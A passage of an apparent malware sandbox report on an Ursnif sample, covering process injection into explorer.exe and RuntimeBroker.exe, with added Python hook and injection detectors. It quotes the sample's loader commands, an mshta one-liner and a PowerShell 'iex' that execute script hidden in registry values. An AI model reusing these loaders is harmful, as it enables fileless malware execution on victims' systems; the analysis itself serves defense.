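        out[name] = _u32(image, funcs + 4 * _u16(image, ords + 2 * i))
    return out


def decode_jump(image, rva):
    """Target of an x64 jmp at rva: E9 rel32 gives an RVA, FF 25 disp32 gives the
    absolute VA stored in the RIP-relative slot.  None if it is not a jump."""
    if image[rva:rva + 1] == b"\xE9":
        return rva + 5 + struct.unpack_from("<i", image, rva + 1)[0]
    if image[rva:rva + 2] == b"\xFF\x25":
        slot = rva + 6 + struct.unpack_from("<i", image, rva + 2)[0]
        return struct.unpack_from("<Q", image, slot)[0]
    return None


def find_eat_hooks(mem, disk):
    """Exports whose AddressOfFunctions entry differs in memory (EAT hook)."""
    d, m = parse_exports(disk), parse_exports(mem)
    return {n: (d[n], m.get(n)) for n in d if m.get(n) != d[n]}


def find_inline_hooks(mem, disk, prologue=8):
    """Exports whose first bytes, at the *clean* RVA, were patched in memory.
    Value is the decoded jump target, or None for a patch that is not a jmp."""
    return {n: decode_jump(mem, rva) for n, rva in parse_exports(disk).items()
            if mem[rva:rva + prologue] != disk[rva:rva + prologue]}


def build_image(funcs):
    """Constructed minimal PE32+ image exporting {name: code}.  RVA == offset and
    names are sorted, as GetProcAddress binary-searches the name table."""
    names = sorted(funcs)
    n, exp = len(names), 0x200
    eat, ent = exp + 0x28, exp + 0x28 + 4 * n
    eot = ent + 4 * n
    strs = eot + 2 * n
    blob, str_rvas = bytearray(), []
    for nm in names:
        str_rvas.append(strs + len(blob))
        blob += nm.encode() + b"\0"
    code_base = (strs + len(blob) + 0xF) & ~0xF
    code, code_rvas = bytearray(), []
    for nm in names:
        code_rvas.append(code_base + len(code))
        code += funcs[nm].ljust(16, b"\xCC")
    img = bytearray(code_base + len(code))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x84, 0x8664, 1, 0, 0, 0, 0xF0, 0x2022)  # IMAGE_FILE_HEADER
    struct.pack_into("<H", img, 0x98, 0x20B)                                   # PE32+ magic
    struct.pack_into("<II", img, 0x98 + 0x70, exp, 0x28)                        # export DataDirectory
    struct.pack_into("<IIHHIIIIIII", img, exp, 0, 0, 0, 0, 0, 1, n, n, eat, ent, eot)
    for i in range(n):
        struct.pack_into("<I", img, eat + 4 * i, code_rvas[i])
        struct.pack_into("<I", img, ent + 4 * i, str_rvas[i])
        struct.pack_into("<H", img, eot + 2 * i, i)
    img[strs:strs + len(blob)] = blob
    img[code_base:] = code
    return bytes(img)


def patch(image, off, data):
    b = bytearray(image); b[off:off + len(data)] = data; return bytes(b)


# Constructed fixture: plausible x64 prologues, not the real KERNEL32 code.
CLEAN = {
    "CreateProcessAsUserW": bytes.fromhex("48895c2408 48896c2410 4889742418"),
    "CreateProcessW":       bytes.fromhex("4c8bdc 53 56 57 4883ec70"),
    "GetLastError":         bytes.fromhex("65488b042560000000 8b4068 c3"),
}
DISK = build_image(CLEAN)
CLEAN_RVA = parse_exports(DISK)
INJECTED_VA, INJECTED_RVA = 0xD70000, 0x5000          # pretend injected region (assumed)
# inline hook 1: jmp [rip+0]; dq INJECTED_VA  (14-byte absolute jump)
MEM = patch(DISK, CLEAN_RVA["CreateProcessAsUserW"], b"\xFF\x25\x00\x00\x00\x00" + struct.pack("<Q", INJECTED_VA))
# inline hook 2: jmp rel32
MEM = patch(MEM, CLEAN_RVA["CreateProcessW"], b"\xE9" + struct.pack("<i", 0x1000))
# EAT hook: rewrite GetLastError's AddressOfFunctions slot (ordinal 2, third sorted name)
MEM = patch(MEM, _u32(MEM, export_dir_rva(MEM) + 0x1C) + 4 * 2, struct.pack("<I", INJECTED_RVA))

if __name__ == "__main__":
    print("EAT hooks:", find_eat_hooks(MEM, DISK))
    print("inline hooks:", {n: hex(t) for n, t in find_inline_hooks(MEM, DISK).items()})
```

Two points matter when running this against a real process: compare prologues at the RVA taken from the disk copy, not from the in-memory EAT, otherwise an EAT hook silently redirects the inline check to the attacker's stub; and relocate the disk copy to the module's load base (or compare RVA-relative, as here), since ASLR makes raw VA comparisons meaningless. decode_jump only understands the two common x64 hook shapes; any other patch is still reported, with target None.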

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write (x4)
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 1B888A50000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27740170000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 35D0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580 (x5)
Writes to foreign memory regions
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0 (x2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2AE0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 93C000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: D70000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 1B888A50000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057A000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E30000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 (x2)
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 35D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 2AE0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 93C000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: D70000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Thread register set: target process: 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe Thread register set: target process: 6080
Source: C:\Windows\explorer.exe Thread register set: target process: 4084
Source: C:\Windows\explorer.exe Thread register set: target process: 4176
Source: C:\Windows\explorer.exe Thread register set: target process: 4440
Source: C:\Windows\explorer.exe Thread register set: target process: 4544
Source: C:\Windows\explorer.exe Thread register set: target process: 6088
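Read together, the injection signatures above describe one relay: the sample writes into a suspended control.exe and sets its thread context; control.exe (and the mshta-spawned PowerShell) allocates RWX memory in explorer.exe, writes to it, flips the protection of 7FFC8DCB1580 to RWX, patches it, restores RX and starts a thread there; the now-hosted code in explorer.exe repeats the same steps against five RuntimeBroker.exe processes and a cvtres.exe. The following is an added example, not code from the report or from the sample, that correlates such events per (injector, victim) pair and walks the resulting graph from the sample outward. The trace is constructed: the pids and addresses are the ones printed above, the sample's own pid (1234) and the Nt* API names are assumed (the report only lists the effects), and the address range labelled as the system DLL containing 7FFC8DCB1580 is assumed too, since the report does not name that module.

```python
from collections import defaultdict

# Constructed API trace for this report's chain (see the lead-in for what is assumed).
SAMPLE = "FpYf5EGDO9.exe"
TRACE = [  # (source image, source pid, api, target image, target pid, address, protection)
    (SAMPLE, 1234, "NtWriteVirtualMemory",          "control.exe", 2904, 0x7FF68E5512E0, None),
    (SAMPLE, 1234, "NtSetContextThread",            "control.exe", 2904, None, None),
    ("control.exe", 2904, "NtAllocateVirtualMemory", "explorer.exe", 3352, 0xD70000, "RWX"),
    ("control.exe", 2904, "NtWriteVirtualMemory",    "explorer.exe", 3352, 0xD70000, None),
    ("control.exe", 2904, "NtProtectVirtualMemory",  "explorer.exe", 3352, 0x7FFC8DCB1580, "RWX"),
    ("control.exe", 2904, "NtWriteVirtualMemory",    "explorer.exe", 3352, 0x7FFC8DCB1580, None),
    ("control.exe", 2904, "NtProtectVirtualMemory",  "explorer.exe", 3352, 0x7FFC8DCB1580, "RX"),
    ("control.exe", 2904, "NtCreateThreadEx",        "explorer.exe", 3352, 0x7FFC8DCB1580, None),
    ("explorer.exe", 3352, "NtAllocateVirtualMemory", "RuntimeBroker.exe", 4084, 0x1B91F360000, "RWX"),
    ("explorer.exe", 3352, "NtWriteVirtualMemory",    "RuntimeBroker.exe", 4084, 0x1B91F360000, None),
    ("explorer.exe", 3352, "NtWriteVirtualMemory",    "RuntimeBroker.exe", 4084, 0x7FFC8DCB1580, None),
    ("explorer.exe", 3352, "NtCreateThreadEx",        "RuntimeBroker.exe", 4084, 0x7FFC8DCB1580, None),
    ("taskmgr.exe", 5000, "NtReadVirtualMemory",      "explorer.exe", 3352, 0x940000, None),  # benign read
]

# Assumed range of the system DLL holding 0x7FFC8DCB1580 in every victim.  System
# DLLs get one base per boot, so the injector can patch the same VA in each target.
SYSTEM_DLL_RANGES = {"system DLL (assumed)": (0x7FFC8DC90000, 0x7FFC8DE80000)}

WRITE = {"NtWriteVirtualMemory"}
ALLOC = {"NtAllocateVirtualMemory", "NtMapViewOfSection"}
EXEC = {"NtCreateThreadEx", "NtSetContextThread", "NtQueueApcThread"}


def classify_pairs(trace):
    """Per (injector pid, victim pid): verdict plus which system modules were written.
    write + exec with a fresh executable region -> remote code injection;
    write + exec without one -> thread hijack (e.g. a suspended child patched at
    its entry point, which is what the sample does to control.exe)."""
    stages, patched = defaultdict(set), defaultdict(set)
    for src, spid, api, tgt, tpid, addr, prot in trace:
        key = (spid, tpid)
        if api in WRITE:
            stages[key].add("write")
            for dll, (lo, hi) in SYSTEM_DLL_RANGES.items():
                if addr is not None and lo <= addr < hi:
                    patched[key].add(dll)
        elif api in ALLOC and prot == "RWX":
            stages[key].add("alloc_rwx")
        elif api == "NtProtectVirtualMemory" and prot in ("RWX", "RX"):
            stages[key].add("protect_exec")
        elif api in EXEC:
            stages[key].add("exec")
    verdicts = {}
    for key, s in stages.items():
        if {"write", "exec"} <= s:
            kind = "remote_code_injection" if s & {"alloc_rwx", "protect_exec"} else "thread_hijack"
            verdicts[key] = (kind, sorted(patched[key]))
    return verdicts


def injection_chains(trace, root_pid):
    """Follow injector -> victim edges from root_pid to show how far the code travelled."""
    edges, names = defaultdict(set), {}
    for src, spid, api, tgt, tpid, *_ in trace:
        names[spid], names[tpid] = src, tgt
        if api in EXEC:
            edges[spid].add(tpid)
    chains = []

    def walk(pid, path):
        if not edges.get(pid):
            chains.append(path)
            return
        for nxt in sorted(edges[pid]):
            if nxt not in path:
                walk(nxt, path + [nxt])

    walk(root_pid, [root_pid])
    return [[f"{names[p]}({p})" for p in c] for c in chains]


if __name__ == "__main__":
    for (spid, tpid), (kind, dlls) in sorted(classify_pairs(TRACE).items()):
        print(f"{spid} -> {tpid}: {kind}, system modules written: {dlls or 'none'}")
    print(" -> ".join(injection_chains(TRACE, 1234)[0]))
```

The pair view is what separates this from a per-call alert: a single NtWriteVirtualMemory from explorer.exe is noise, a write followed by a thread start or context change in the same victim is not. The chain view matters for scoping, because the process that talks to lycos.com and yahoo.com here is explorer.exe, three hops from the file that was submitted.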
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.485521161.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47A2E cpuid 0_2_03C47A2E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401E22
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_03C47A2E
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_00401752

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
